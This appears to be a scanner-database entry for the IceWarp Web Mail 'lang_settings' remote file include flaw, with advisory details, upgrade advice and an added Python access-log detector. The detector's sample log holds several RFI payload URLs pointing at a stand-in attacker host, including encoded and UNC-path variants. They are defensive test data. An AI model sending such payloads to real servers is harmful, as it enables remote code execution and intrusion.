VID: 21939
Severity: 40
Port: 32000, ...
Protocol: TCP
Class: CGI
Detailed Description |
The IceWarp Web Mail server is vulnerable to remote file include (RFI) attacks via the 'lang_settings' parameter. IceWarp Web Mail is a multi-featured Web mail server for Microsoft Windows platforms; Deerfield VisNetic Mail Server and Merak Mail Server integrate it into their suites. Merak Mail Server version 8.3.8r with IceWarp Web Mail versions prior to 5.6.1, and VisNetic MailServer versions prior to 8.5.0.5, could allow a remote attacker to include malicious PHP files because user-supplied input passed to the 'lang_settings' parameter of the 'accounts/inc/include.php' and 'admin/inc/include.php' scripts is not properly validated before it is used in a PHP include. A remote attacker who can reach the Web Mail interface could send a specially crafted URL that points 'lang_settings' at an attacker-controlled file and so execute arbitrary PHP code, and through it operating system commands, with the privileges of the Web Mail process on the affected host. No authentication is required beyond reaching the scripts.
* References:
  * http://secunia.com/secunia_research/2006-12/advisory/
  * http://secunia.com/secunia_research/2006-14/advisory/
  * http://secunia.com/advisories/18953/
  * http://secunia.com/advisories/18966/
  * http://securitytracker.com/alerts/2006/Jul/1016513.html
* Platforms Affected:
  * Deerfield, VisNetic Mail Server 8.3.5
  * IceWarp Software, IceWarp Web Mail 5.6.0
  * Merak Mail Server, Inc., Merak Mail Server 8.3.8.r
  * Microsoft Windows, any version
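As an added example, not code from the advisory or from IceWarp: a small Python scanner that checks Web server access-log lines for remote-file-include attempts against the two script paths and the parameter named above. The script paths and the 'lang_settings' parameter come from the advisory; the log lines, client addresses and payload hosts are constructed for the demonstration (documentation address ranges), and the log format assumed is Apache common/combined, so an IIS W3C log would need a different line pattern.

```python
"""Flag remote-file-include attempts against IceWarp Web Mail's lang_settings.

Added example, not code from the advisory or from IceWarp. Script paths and the
parameter name are taken from the advisory; the log lines, IPs and payload hosts
below are constructed for the demonstration.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts named in the advisory, matched by suffix because the webmail may be
# installed under a URL prefix (e.g. /mail/).
VULNERABLE_SCRIPTS = ("/accounts/inc/include.php", "/admin/inc/include.php")
PARAM = "lang_settings"

# Prefixes that make PHP's include() load code from another host: URL wrappers
# (when allow_url_fopen is on) and, since IceWarp runs on Windows, UNC share paths.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://", "\\\\", "//")

# Apache common/combined request line: client, timestamp, "METHOD TARGET PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode(value: str) -> str:
    """Percent-decode twice so double-encoded payloads (%2568ttp...) are unmasked."""
    return unquote(unquote(value))


def is_remote_include(value: str) -> bool:
    """True if a lang_settings value would make include() fetch a remote resource."""
    v = decode(value).strip().lower()
    return v.startswith(REMOTE_PREFIXES)


def scan_log(lines):
    """Return (client_ip, timestamp, script_path, decoded_value) per RFI attempt.

    Only GET requests expose the query string in an access log; a POST body
    carrying lang_settings needs a proxy or WAF log to catch.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        target = urlsplit(m.group("target"))
        path = unquote(target.path).lower()
        if not path.endswith(VULNERABLE_SCRIPTS):
            continue
        # keep_blank_values so a present-but-empty parameter is still visible
        for value in parse_qs(target.query, keep_blank_values=True).get(PARAM, []):
            if is_remote_include(value):
                hits.append((m.group("ip"), m.group("ts"), target.path, decode(value)))
    return hits


# Constructed sample log: two plain RFI probes, one percent-encoded with a trailing
# NUL, one UNC-path variant, one benign request and one against an unrelated script.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2006:08:15:02 +0000] "GET /accounts/inc/include.php?lang_settings=http://203.0.113.9/shell.txt? HTTP/1.0" 200 512',
    '198.51.100.4 - - [10/Jul/2006:08:15:10 +0000] "GET /accounts/inc/include.php?lang_settings=english HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Jul/2006:08:16:41 +0000] "GET /mail/admin/inc/include.php?lang_settings=%68%74%74%70%3a%2f%2f203.0.113.9%2fx.txt%00 HTTP/1.1" 200 320',
    '192.0.2.22 - - [10/Jul/2006:08:17:00 +0000] "GET /admin/inc/include.php?lang_settings=%5C%5C203.0.113.9%5Cshare%5Cx.php HTTP/1.1" 500 0',
    '192.0.2.23 - - [10/Jul/2006:08:18:00 +0000] "GET /index.php?lang_settings=http://203.0.113.9/x.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, ts, path, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {path} lang_settings={value!r}")
```

A hit with a 200 status is the one to act on first: the include ran, so the host should be treated as compromised rather than merely probed, and the payload URL in the log gives the staging host to block and to pull the payload from for analysis.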
Recommendation |
For Merak Mail Server: Upgrade to the latest version of MERAK Mail Server, available from the Merak Mail Server Web site at http://www.merakmailserver.com/Products/Merak_Mail_Server/ . Note that 8.3.8.r, the release named above as affected, ships a vulnerable Web Mail; the fix is a release that bundles IceWarp Web Mail 5.6.1 or later.
For VisNetic Mail Server: Upgrade to the latest version of VisNetic Mail Server (8.5.0.5 or later), available from the VisNetic Mail Server Web site at http://www.deerfield.net/products/visnetic-mailserver/vmstoiw.htm/
For IceWarp Web Mail: Upgrade to the latest version of IceWarp Web Mail (5.6.1 or later), available from the IceWarp Web Mail Web site at http://www.icewarp.com/Products/IceWarp_Web_Mail/
Related URL: CVE-2006-0817, CVE-2006-0818 (CVE)
Related URL: 19002, 19007 (SecurityFocus)
Related URL: 27773, 27780 (ISS)